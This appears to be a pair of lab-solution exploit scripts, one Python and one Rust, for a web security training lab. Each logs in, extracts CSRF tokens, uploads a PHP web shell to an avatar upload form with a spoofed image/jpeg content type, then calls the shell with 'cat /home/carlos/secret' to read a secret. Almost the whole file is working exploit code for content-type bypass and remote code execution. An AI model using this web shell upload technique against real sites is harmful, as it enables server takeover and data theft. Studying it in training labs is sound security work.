File: with-python/file-upload-vulnerabilities/02-web-shell-upload-via-content-type-restriction-bypass.py
import requests
import argparse
from lxml import html
import pyperclip
import time

username = "wiener"
password = "peter"


if __name__ == "__main__":
    start_time = time.perf_counter()

    parser = argparse.ArgumentParser(prog="Remote Code Execution Via Webshell Upload")
    parser.add_argument(
        "-u", "--lab-url", help="Your lab instance URL is required", required=True
    )

    args = parser.parse_args()

    lab_url = args.lab_url.strip("/")

    # Creating a Session Object
    # https://docs.python-requests.org/en/latest/api/#request-sessions
    session = requests.Session()

    # Fetching the login page to get the login page csrf token and parsing it with lxml to generate a tree
    login_page_tree = html.fromstring(session.get(url=f"{lab_url}/login").text)

    # Extracting the login form csrf token using xpath
    login_csrf_token = login_page_tree.xpath('//input[@name="csrf"]/@value')[0]
    print(f"[+] Login CSRF Token: {login_csrf_token}")

    # Logging in as the given user and generating the tree for My Account page
    my_account_page_tree = html.fromstring(
        session.post(
            url=f"{lab_url}/login",
            data={"username": username, "password": password, "csrf": login_csrf_token},
        ).text
    )

    # Extracting the avatar upload form csrf token
    my_account_avatar_upload_csrf = my_account_page_tree.xpath(
        '//form[@id="avatar-upload-form"]/input[@name="csrf"]/@value'
    )[0]
    print(f"[+] My Account Avatar CSRF Token: {login_csrf_token}")

    # Uploading the payload
    avatar_file_upload_response = session.post(
        url=f"{lab_url}/my-account/avatar",
        data={
            "user": username,
            "csrf": my_account_avatar_upload_csrf,
        },
        files={
            # File Tuple Syntax: (filename, file-content, content-type)
            "avatar": (
                "web-shell.php",
                "<?php echo system($_GET['command']); ?>",
                # Bypassing the Content-Type restriction
                "image/jpeg",
            )
        },
    )

    if avatar_file_upload_response.ok:
        flag = session.get(
            url=f"{lab_url}/files/avatars/web-shell.php?command=cat /home/carlos/secret"
        ).text

        # When I was trying this lab, the response contains the flag duplicated like this: <flag><flag>
        # To get the correct flag, simply split the string in half and compare the two halves.
        # If they are equal, keep only one half of the flag
        half = len(flag) // 2
        if flag[:half] == flag[half:]:
            flag = flag[:half]

        print(f"[+] Flag: {flag}")

        # Copying flag to clipboard
        pyperclip.copy(flag)
        print("[+] Flag copied to clipboard")
    else:
        print("[-] Failed to Fetch Flag")

    end_time = time.perf_counter()
    print(f"[+] Total Time Taken: {end_time - start_time}")

File: with-rust/file-upload-vulnerabilities/src/bin/02-web-shell-upload-via-content-type-restriction-bypass.rs
use file_upload_vulnerabilities::{
    HTTP_CLIENT, LOGIN_CSRF_TOKEN_SELECTOR, MY_AVATAR_UPLOAD_CSRF_TOKEN_SELECTOR, PASSWORD,
    USERNAME, WEBSHELL, generate_clap_parser, get_csrf_token, get_flag,
};
use reqwest::blocking::{
    Response,
    multipart::{Form, Part},
};
use std::time::{Duration, Instant};

fn main() {
    let start_time: Instant = Instant::now();

    let args = generate_clap_parser();
    let lab_url = args.lab_url.as_str().trim_end_matches("/");

    // Making a get request to the given URL
    let response: Response = HTTP_CLIENT
        .get(format!("{}/login", lab_url))
        .send()
        .expect("[-] Failed to make GET request");

    // Extracting the body from the response
    let body: String = response.text().expect("[-] Failed to read response text");

    // Getting the CSRF token for /login page
    let login_page_csrf_token = get_csrf_token(&body, &LOGIN_CSRF_TOKEN_SELECTOR);
    println!("[+] Login CSRF Token: {}", login_page_csrf_token);

    // Generating the login form data
    let data = [
        ("username", USERNAME),
        ("password", PASSWORD),
        ("csrf", &login_page_csrf_token),
    ];

    // Logging in as the given user. This request responds with the /my-account?id=wiener page
    let response = HTTP_CLIENT
        .post(format!("{}/login", lab_url))
        .form(&data)
        .send()
        .expect("[-] Failed to login as the given user");

    // Extracting the body from the response
    let body = response.text().expect("[-] Failed to read response text");

    // Getting the CSRF token from the /my-account?id=wiener page for the uploading avatar
    let my_avatar_upload_csrf_token = get_csrf_token(&body, &MY_AVATAR_UPLOAD_CSRF_TOKEN_SELECTOR);

    println!(
        "[+] My Avatar Upload CSRF Token: {}",
        &my_avatar_upload_csrf_token
    );

    // Generating the web shell payload to upload
    let payload: Part = Part::bytes(WEBSHELL.as_bytes())
        .file_name("web-shell.php")
        // Bypassing Content-Type restriction
        .mime_str("image/jpeg")
        .expect("[-] Failed to generate payload");

    // Generating avatar upload multipart form data
    let form: Form = Form::new()
        .text("user", USERNAME)
        .text("csrf", my_avatar_upload_csrf_token)
        .part("avatar", payload);

    // Uploading the Payload
    let response = HTTP_CLIENT
        .post(format!("{}/my-account/avatar", lab_url))
        .multipart(form)
        .send()
        .expect("[-] Failed to upload payload");

    // If payload upload successful
    if response.status() == 200 {
        // Trying to read the secret
        let response: Response = HTTP_CLIENT
            .get(format!(
                "{}/files/avatars/web-shell.php?command=cat /home/carlos/secret",
                lab_url
            ))
            .send()
            .expect("[-] Failed to get secret");

        if response.status() == 200 {
            get_flag(response.text().expect("[-] Failed to read secret"));
        }
    }

    let total_time: Duration = Instant::elapsed(&start_time);
    println!("[+] Total time taken: {}", total_time.as_secs_f64());
}
